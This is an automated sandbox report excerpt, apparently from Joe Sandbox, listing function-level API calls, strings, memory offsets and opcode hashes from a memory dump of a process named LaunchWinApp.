                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: H_prolog
                    • String ID: false$true
                    • API String ID: 3519838083-2658103896
                    • Opcode ID: 2c230bbe56877acea673e662f32d522eb1d73fb39336ca91362bff78453e1351
                    • Instruction ID: a9da9812de1df213551776536eacaf657d27d5aea58e29d0a14d5aa335713042
                    • Opcode Fuzzy Hash: 2c230bbe56877acea673e662f32d522eb1d73fb39336ca91362bff78453e1351
                    • Instruction Fuzzy Hash: 9F21A471900744AED720EFA5D841BDAB7F8EF09304F04852FE6A5D7741EB74A504CB99
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 0042B0FE
                    • GdipGetImageEncoders.GDIPLUS(?,?,00000000), ref: 0042B123
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: EncodersGdipImage$Size
                    • String ID: image/jpeg
                    • API String ID: 864223233-3785015651
                    • Opcode ID: 9a09a9b044f5623806d58d6f38f2c7a121c8a0d69835521d41d0963dc328c1ca
                    • Instruction ID: c5f7e4e64d09994b032ccdd31602c26a0c15d3a3aba06b4400188f8ca9e3e1f2
                    • Opcode Fuzzy Hash: 9a09a9b044f5623806d58d6f38f2c7a121c8a0d69835521d41d0963dc328c1ca
                    • Instruction Fuzzy Hash: 74110A36D00218FFDB00DF999C808AFFBB5EE41360B60016FE81573291D7755E519A94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Strings
                    • A:\_Work\rc-build-v1-exe\json.hpp, xrefs: 00425EB7
                    • m_object != nullptr, xrefs: 00425EBC
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: H_prolog
                    • String ID: A:\_Work\rc-build-v1-exe\json.hpp$m_object != nullptr
                    • API String ID: 3519838083-1282721270
                    • Opcode ID: dec44afa91cf3b9f53d72d2be943b320470683b371e7722c7d8a9eee2e290af3
                    • Instruction ID: 1eea9421f6fa27460d8faf2e93557ba0d4c668703bda1c84fc21c7a75faf9df9
                    • Opcode Fuzzy Hash: dec44afa91cf3b9f53d72d2be943b320470683b371e7722c7d8a9eee2e290af3
                    • Instruction Fuzzy Hash: C2118B71A00A10ABC724EB59D986E9AB3F5EF10324FA0891BE455E3640D739EE04CA59
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free
                    • String ID: d3G
                    • API String ID: 269201875-2890664941
                    • Opcode ID: e61348188f6cecc45c9e88a49037ff9d43c758bc04c5b41ee635153f58cd7e04
                    • Instruction ID: 719457d60c93a8b444615d75b8e255b4b8b718e11c4cc0f5774e7abd4b7be7b5
                    • Opcode Fuzzy Hash: e61348188f6cecc45c9e88a49037ff9d43c758bc04c5b41ee635153f58cd7e04
                    • Instruction Fuzzy Hash: 00F0F932509B107AE7112A62AD42B977748EB427B4F20006FFC4C6A143EFA9080142BF
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • std::_Lockit::_Lockit.LIBCPMT ref: 004400AC
                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00440107
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: Lockitstd::_$Lockit::_Lockit::~_
                    • String ID: \1A
                    • API String ID: 593203224-1566668914
                    • Opcode ID: 7b8d2485e05b089728a2e493fafb8867dc345cfd6ed1c297580e8065cb1341b8
                    • Instruction ID: f2b59be12c1c4504e2c29a8c9102660fb5c1504f836a62e00c8fcff558bff847
                    • Opcode Fuzzy Hash: 7b8d2485e05b089728a2e493fafb8867dc345cfd6ed1c297580e8065cb1341b8
                    • Instruction Fuzzy Hash: 3801B135A00204AFDB04DF5AD855E5E7BB9EF88710B1440AAED019B3A1EF70EE40CB94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 004614ED: EnterCriticalSection.KERNEL32(00000000,?,00457ED6,00000000,00485DD8,00000010,00445C19,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00461508
                    • FlushFileBuffers.KERNEL32(00000000,00485DB8,0000000C,004576DF,0044560C,00000000,?,?,0044560C,00000000,?), ref: 00457621
                    • GetLastError.KERNEL32 ref: 00457632
                    Strings
                    • A:\_Work\rc-build-v1-exe\json.hpp, xrefs: 00457619
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: BuffersCriticalEnterErrorFileFlushLastSection
                    • String ID: A:\_Work\rc-build-v1-exe\json.hpp
                    • API String ID: 4109680722-4059005155
                    • Opcode ID: 8aca5a384a130709495133b64f9b01ca07cbe28d016f31981a179344f07294d3
                    • Instruction ID: 517f7b910fb15b9e83242d317033869e00583d672b71bd95776c1903159fed41
                    • Opcode Fuzzy Hash: 8aca5a384a130709495133b64f9b01ca07cbe28d016f31981a179344f07294d3
                    • Instruction Fuzzy Hash: 6D01D232A002108FD710AFADE846A9D7BE4EF49724F14412FF8119B3E2EB789801CB58
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateDirectoryW.KERNEL32(fA,00000000,?,?,?,?,?,?,?,?,?,004166EE), ref: 0043F79D
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,004166EE), ref: 0043F7B0
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateDirectoryErrorLast
                    • String ID: fA
                    • API String ID: 1375471231-3595381179
                    • Opcode ID: 7f117bdf9542e0e9455c3ff1d9efaa36734eef7993e501978144e461788087b3
                    • Instruction ID: aab51e86ca4216de9860d6553d9cba86a64db35d3cb21742e8a5e51a54672639
                    • Opcode Fuzzy Hash: 7f117bdf9542e0e9455c3ff1d9efaa36734eef7993e501978144e461788087b3
                    • Instruction Fuzzy Hash: 13F09634F041186BDB015A588C80BDFBFE99B68368F209177E800A6354DBB4DD8AC395
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Strings
                    • A:\_Work\rc-build-v1-exe\json.hpp, xrefs: 00426063
                    • object != nullptr, xrefs: 00426068
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: H_prolog
                    • String ID: A:\_Work\rc-build-v1-exe\json.hpp$object != nullptr
                    • API String ID: 3519838083-2355325030
                    • Opcode ID: 8c17251beb50ada09840f16e74cd6ad8ab21c1947feebc6feee927d0544b7275
                    • Instruction ID: b270a931fb3d8c51c8a2b06873d38c6ab27a24af5998e314c7ad61ce3866dac3
                    • Opcode Fuzzy Hash: 8c17251beb50ada09840f16e74cd6ad8ab21c1947feebc6feee927d0544b7275
                    • Instruction Fuzzy Hash: D0F04FB2E00614ABC721EF6994026CEBBF4EF98754F10453FE549E7240EB7886148B95
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Strings
                    • A:\_Work\rc-build-v1-exe\json.hpp, xrefs: 0042533E
                    • object != nullptr, xrefs: 00425343
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: H_prolog
                    • String ID: A:\_Work\rc-build-v1-exe\json.hpp$object != nullptr
                    • API String ID: 3519838083-2355325030
                    • Opcode ID: 3cd2ce8a469ec1fe3a4a12f3354153b40ad996032e037c81a99fc079bb7cd5d2
                    • Instruction ID: c746586c6410cb7b842a3d9422f674b7d5bdd00d25af5b2e3ee2ba044bde6932
                    • Opcode Fuzzy Hash: 3cd2ce8a469ec1fe3a4a12f3354153b40ad996032e037c81a99fc079bb7cd5d2
                    • Instruction Fuzzy Hash: 8DF03CB2E407149ED761EF689402799BBF0EF04754F10816FE949EB241E67886148B8A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CompareStringW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,00000000,SFF,004645E9,?,?,00000000,?,00000000), ref: 00458B4A
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: CompareString
                    • String ID: SFF$\1A
                    • API String ID: 1825529933-211022277
                    • Opcode ID: 1ce6a69c38e504dc32a19213d4623eb196c605965d2a9a7f4c4fc4381e62753b
                    • Instruction ID: 9df318d7aa59986ff875c42885e32a307f720c9909f6b508079be678eb293b6e
                    • Opcode Fuzzy Hash: 1ce6a69c38e504dc32a19213d4623eb196c605965d2a9a7f4c4fc4381e62753b
                    • Instruction Fuzzy Hash: F6F0B83600015ABBCF021F91DC05DDE3F66AF083A1B044029FE1825121CA36D872AB99
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Strings
                    • A:\_Work\rc-build-v1-exe\json.hpp, xrefs: 0042539A
                    • object != nullptr, xrefs: 0042539F
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: H_prolog
                    • String ID: A:\_Work\rc-build-v1-exe\json.hpp$object != nullptr
                    • API String ID: 3519838083-2355325030
                    • Opcode ID: 09be4980480aeac8f688599d45f9f475c820cce6d217246497adaf92e34e6409
                    • Instruction ID: d4477f8f5ce939975973547e7c3928c9c9c376e0d884100a7fad34f97490dec4
                    • Opcode Fuzzy Hash: 09be4980480aeac8f688599d45f9f475c820cce6d217246497adaf92e34e6409
                    • Instruction Fuzzy Hash: 18F0A072E40618ABC721FBA4C4027DEBBB49F40B55F00412FE945B7281E6B80A0487DB
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • InitializeCriticalSectionAndSpinCount.KERNEL32(000000FF,?), ref: 00458DFF
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: CountCriticalInitializeSectionSpin
                    • String ID: InitializeCriticalSectionEx$\1A
                    • API String ID: 2593887523-2129004796
                    • Opcode ID: e00753f2a38f50dd74616300afcb00231ad287ae6f4897d70f8411bd76cf0d00
                    • Instruction ID: 9bc37a0b88e135787b236ec171939a3dfaa57e08d5f42e4e8eae978df1df4395
                    • Opcode Fuzzy Hash: e00753f2a38f50dd74616300afcb00231ad287ae6f4897d70f8411bd76cf0d00
                    • Instruction Fuzzy Hash: 9EE09235540258F7CB112F52DC06DDE7F66EB04B61B00C426FD1C25163EEB68921AAD9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • __EH_prolog.LIBCMT ref: 004143AB
                    • std::locale::_Init.LIBCPMT ref: 004143C9
                      • Part of subcall function 00440010: std::_Lockit::_Lockit.LIBCPMT ref: 00440022
                      • Part of subcall function 00440010: std::locale::_Setgloballocale.LIBCPMT ref: 0044003D
                      • Part of subcall function 00440010: _Yarn.LIBCPMT ref: 00440053
                      • Part of subcall function 00440010: std::_Lockit::~_Lockit.LIBCPMT ref: 00440093
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: Lockitstd::_std::locale::_$H_prologInitLockit::_Lockit::~_SetgloballocaleYarn
                    • String ID: x7A
                    • API String ID: 2306917479-880751048
                    • Opcode ID: 1fdde5069a340e2115be8005ea7888d4cb4889a8b2f472256d2094b2a558b376
                    • Instruction ID: cdf64166deaf435bdbc3126d35dbf11d1c965a41a110df625318a4c77f960365
                    • Opcode Fuzzy Hash: 1fdde5069a340e2115be8005ea7888d4cb4889a8b2f472256d2094b2a558b376
                    • Instruction Fuzzy Hash: 38E09A32700611ABD324AB9AA50238CF7E4EF84B29F10802FE101E7681EFB869248659
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: Alloc
                    • String ID: FlsAlloc$\1A
                    • API String ID: 2773662609-1270891297
                    • Opcode ID: cb2ac133acc39799faead7e636c3bc88ffcdf4ec6b9288de109425888709abf1
                    • Instruction ID: d636e7a5e27fc96ca263781990e840e6df6f6dfe9167fa043c4602a8c0a8e837
                    • Opcode Fuzzy Hash: cb2ac133acc39799faead7e636c3bc88ffcdf4ec6b9288de109425888709abf1
                    • Instruction Fuzzy Hash: C6E072B1680224BB820222A25C06FEA3A4CCB00B73F00002BFD0C72292EDE8A80159DE
                    Uniqueness

                    Uniqueness Score: -1.00%